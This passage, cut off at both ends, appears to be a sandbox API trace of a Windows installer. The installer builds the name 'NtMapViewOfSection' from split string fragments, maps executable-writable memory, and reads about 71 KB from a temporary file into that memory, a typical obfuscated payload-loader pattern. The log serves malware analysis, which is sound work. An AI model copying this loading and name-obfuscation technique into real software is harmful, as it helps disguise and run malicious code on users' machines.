lpString2="ll::%s%s%s%s%d", iMaxLength=1024 | out: lpString1="ll::%s%s%s%s%d") returned="ll::%s%s%s%s%d" [0030.080] lstrcpynA (in: lpString1=0x5cd5c8, lpString2="NtM", iMaxLength=1024 | out: lpString1="NtM") returned="NtM" [0030.080] lstrcpynA (in: lpString1=0x5cd9d0, lpString2="apVi", iMaxLength=1024 | out: lpString1="apVi") returned="apVi" [0030.080] lstrcpynA (in: lpString1=0x5cddd8, lpString2="ewOfSect", iMaxLength=1024 | out: lpString1="ewOfSect") returned="ewOfSect" [0030.080] lstrcpynA (in: lpString1=0x5d43b8, lpString2="ion(p r", iMaxLength=1024 | out: lpString1="ion(p r") returned="ion(p r" [0030.080] GetModuleHandleA (lpModuleName="user32") returned 0x74500000 [0030.080] GetProcAddress (hModule=0x74500000, lpProcName="wsprintf") returned 0x0 [0030.080] lstrlenA (lpString="wsprintf") returned 8 [0030.080] GetProcAddress (hModule=0x74500000, lpProcName="wsprintfA") returned 0x7452ea00 [0030.080] lstrcpynA (in: lpString1=0x5cb908, lpString2="5938968", iMaxLength=1024 | out: lpString1="5938968") returned="5938968" [0030.080] lstrcpynA (in: lpString1=0x5cb908, lpString2="ll::%s%s%s%s%d", iMaxLength=1024 | out: lpString1="ll::%s%s%s%s%d") returned="ll::%s%s%s%s%d" [0030.080] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="NtM", iMaxLength=1024 | out: lpString1="NtM") returned="NtM" [0030.080] lstrcpynA (in: lpString1=0x5cd5c8, lpString2="apVi", iMaxLength=1024 | out: lpString1="apVi") returned="apVi" [0030.080] lstrcpynA (in: lpString1=0x5cd9d0, lpString2="ewOfSect", iMaxLength=1024 | out: lpString1="ewOfSect") returned="ewOfSect" [0030.080] lstrcpynA (in: lpString1=0x5ca488, lpString2="ion(p r", iMaxLength=1024 | out: lpString1="ion(p r") returned="ion(p r" [0030.080] lstrcpynA (in: lpString1=0x5cddd8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.080] wsprintfA (in: param_1=0x5a9f18, param_2="ll::%s%s%s%s%d" | out: param_1="ll::NtMapViewOfSection(p r2") returned 27 [0030.080] wsprintfA (in: param_1=0x5cddd8, param_2="%d" | out: param_1="2") returned 1 [0030.080] lstrcpynA (in: lpString1=0x5cddd8, lpString2="ion(p r", iMaxLength=1024 | out: lpString1="ion(p r") returned="ion(p r" [0030.080] lstrcpynA (in: lpString1=0x5cddd8, lpString2="ewOfSect", iMaxLength=1024 | out: lpString1="ewOfSect") returned="ewOfSect" [0030.080] lstrcpynA (in: lpString1=0x5cddd8, lpString2="apVi", iMaxLength=1024 | out: lpString1="apVi") returned="apVi" [0030.080] lstrcpynA (in: lpString1=0x5cddd8, lpString2="NtM", iMaxLength=1024 | out: lpString1="NtM") returned="NtM" [0030.080] lstrcpynA (in: lpString1=0x5cddd8, lpString2="ll::%s%s%s%s%d", iMaxLength=1024 | out: lpString1="ll::%s%s%s%s%d") returned="ll::%s%s%s%s%d" [0030.081] wsprintfA (in: param_1=0x5cddd8, param_2="%d" | out: param_1="5938968") returned 7 [0030.081] FreeLibrary (hLibModule=0x5cb908) returned 0 [0030.081] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.081] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.081] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.081] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.081] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.081] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.081] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.081] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.081] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.081] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.081] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.081] lstrcpynA (in: lpString1=0x4226c1, lpString2="5938968", iMaxLength=1024 | out: lpString1="5938968") returned="5938968" [0030.081] lstrlenA (lpString="5938968") returned 7 [0030.081] lstrcpynA (in: lpString1=0x5d21d4, lpString2="*5938968(&t255 .r5)", iMaxLength=1024 | out: lpString1="*5938968(&t255 .r5)") returned="*5938968(&t255 .r5)" [0030.081] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.081] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.081] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.081] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.081] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.081] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.082] lstrcpyA (in: lpString1=0x5cc118, lpString2="5938968" | out: lpString1="5938968") returned="5938968" [0030.082] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.082] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.082] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.082] lstrcpynA (in: lpString1=0x5cb908, lpString2="ll::NtMapViewOfSection(p r2", iMaxLength=1024 | out: lpString1="ll::NtMapViewOfSection(p r2") returned="ll::NtMapViewOfSection(p r2" [0030.082] lstrcpyA (in: lpString1=0x425400, lpString2="ll::NtMapViewOfSection(p r2" | out: lpString1="ll::NtMapViewOfSection(p r2") returned="ll::NtMapViewOfSection(p r2" [0030.082] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.082] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.082] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.082] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.082] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.082] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.082] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.082] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.082] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.082] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.082] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.082] lstrcpynA (in: lpString1=0x4226c3, lpString2="ll::NtMapViewOfSection(p r2", iMaxLength=1024 | out: lpString1="ll::NtMapViewOfSection(p r2") returned="ll::NtMapViewOfSection(p r2" [0030.082] lstrlenA (lpString="ll::NtMapViewOfSection(p r2") returned 27 [0030.082] lstrcpynA (in: lpString1=0x5d1944, lpString2="ntdll::NtMapViewOfSection(p r2, i -1, p r3, \x09 \x09 \x09\x09\x09 n, n, n, p r4, i 2, n, i 0x40)", iMaxLength=1024 | out: lpString1="ntdll::NtMapViewOfSection(p r2, i -1, p r3, \x09 \x09 \x09\x09\x09 n, n, n, p r4, i 2, n, i 0x40)") returned="ntdll::NtMapViewOfSection(p r2, i -1, p r3, \x09 \x09 \x09\x09\x09 n, n, n, p r4, i 2, n, i 0x40)" [0030.082] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.082] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.082] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.082] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.082] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.083] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.083] lstrcpyA (in: lpString1=0x5cb908, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0030.083] lstrcpyA (in: lpString1=0x5cbd18, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0030.083] lstrcpyA (in: lpString1=0x5cc118, lpString2="NtMapViewOfSection" | out: lpString1="NtMapViewOfSection") returned="NtMapViewOfSection" [0030.083] GetModuleHandleA (lpModuleName="ntdll") returned 0x77190000 [0030.083] GetProcAddress (hModule=0x77190000, lpProcName="NtMapViewOfSection") returned 0x771f8e60 [0030.083] lstrcpynA (in: lpString1=0x5cb908, lpString2="520", iMaxLength=1024 | out: lpString1="520") returned="520" [0030.083] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="5955360", iMaxLength=1024 | out: lpString1="5955360") returned="5955360" [0030.083] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.083] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.083] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.083] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="5955712", iMaxLength=1024 | out: lpString1="5955712") returned="5955712" [0030.083] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.083] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.083] NtMapViewOfSection (in: SectionHandle=0x208, ProcessHandle=0xffffffff, BaseAddress=0x5adf20*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x5ae080*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x5adf20*=0x1eb0000, SectionOffset=0x0, ViewSize=0x5ae080*=0x12000) returned 0x0 [0030.083] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="64") returned 2 [0030.084] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="2") returned 1 [0030.084] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955712") returned 7 [0030.084] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955360") returned 7 [0030.084] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="-1") returned 2 [0030.084] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="520") returned 3 [0030.084] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.084] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.084] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.084] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.084] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.084] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.084] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.084] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.084] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.084] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.084] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.084] lstrcpynA (in: lpString1=0x4226c1, lpString2="5955360", iMaxLength=1024 | out: lpString1="5955360") returned="5955360" [0030.084] lstrlenA (lpString="5955360") returned 7 [0030.084] lstrcpynA (in: lpString1=0x5d0824, lpString2="*5955360\x09 ( \x09 p . \x09 \x09r11\x09\x09\x09 )", iMaxLength=1024 | out: lpString1="*5955360\x09 ( \x09 p . \x09 \x09r11\x09\x09\x09 )") returned="*5955360\x09 ( \x09 p . \x09 \x09r11\x09\x09\x09 )" [0030.084] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.084] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.084] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.084] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.084] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.085] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.085] lstrcpyA (in: lpString1=0x5cc118, lpString2="5955360\x09 " | out: lpString1="5955360\x09 ") returned="5955360\x09 " [0030.085] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.085] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.085] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="32178176") returned 8 [0030.085] lstrcpyA (in: lpString1=0x426c00, lpString2="32178176" | out: lpString1="32178176") returned="32178176" [0030.085] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.085] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.085] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.085] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.085] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.085] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.085] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.085] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.085] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.085] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.085] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.085] lstrcpynA (in: lpString1=0x5d2eac, lpString2="kernel32::ReadFile(i r10, p r11, i 71559, t., n)", iMaxLength=1024 | out: lpString1="kernel32::ReadFile(i r10, p r11, i 71559, t., n)") returned="kernel32::ReadFile(i r10, p r11, i 71559, t., n)" [0030.085] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.085] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.085] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.085] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.085] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.086] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.086] lstrcpyA (in: lpString1=0x5cb908, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.086] lstrcpyA (in: lpString1=0x5cbd18, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.086] lstrcpyA (in: lpString1=0x5cc118, lpString2="ReadFile" | out: lpString1="ReadFile") returned="ReadFile" [0030.086] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000 [0030.086] GetProcAddress (hModule=0x76bc0000, lpProcName="ReadFile") returned 0x76be64a0 [0030.086] lstrlenA (lpString="ReadFile") returned 8 [0030.086] GetProcAddress (hModule=0x76bc0000, lpProcName="ReadFileA") returned 0x0 [0030.086] lstrcpynA (in: lpString1=0x5cb908, lpString2="524", iMaxLength=1024 | out: lpString1="524") returned="524" [0030.086] lstrcpynA (in: lpString1=0x5cb908, lpString2="32178176", iMaxLength=1024 | out: lpString1="32178176") returned="32178176" [0030.086] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.086] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.086] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.086] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.086] ReadFile (in: hFile=0x20c, lpBuffer=0x1eb0000, nNumberOfBytesToRead=0x11787, lpNumberOfBytesRead=0x5ca488, lpOverlapped=0x0 | out: lpBuffer=0x1eb0000*, lpNumberOfBytesRead=0x5ca488*=0x11787, lpOverlapped=0x0) returned 1 [0030.087] lstrcpynA (in: lpString1=0x5cb908, lpString2="\x87\x17\x01", iMaxLength=1024 | out: lpString1="\x87\x17\x01") returned="\x87\x17\x01" [0030.087] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="71559") returned 5 [0030.087] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="32178176") returned 8 [0030.087] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="524") returned 3 [0030.087] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.087] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.087] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.087] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.087] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.087] lstrcpynA (in: lpString1=0x4226c0, 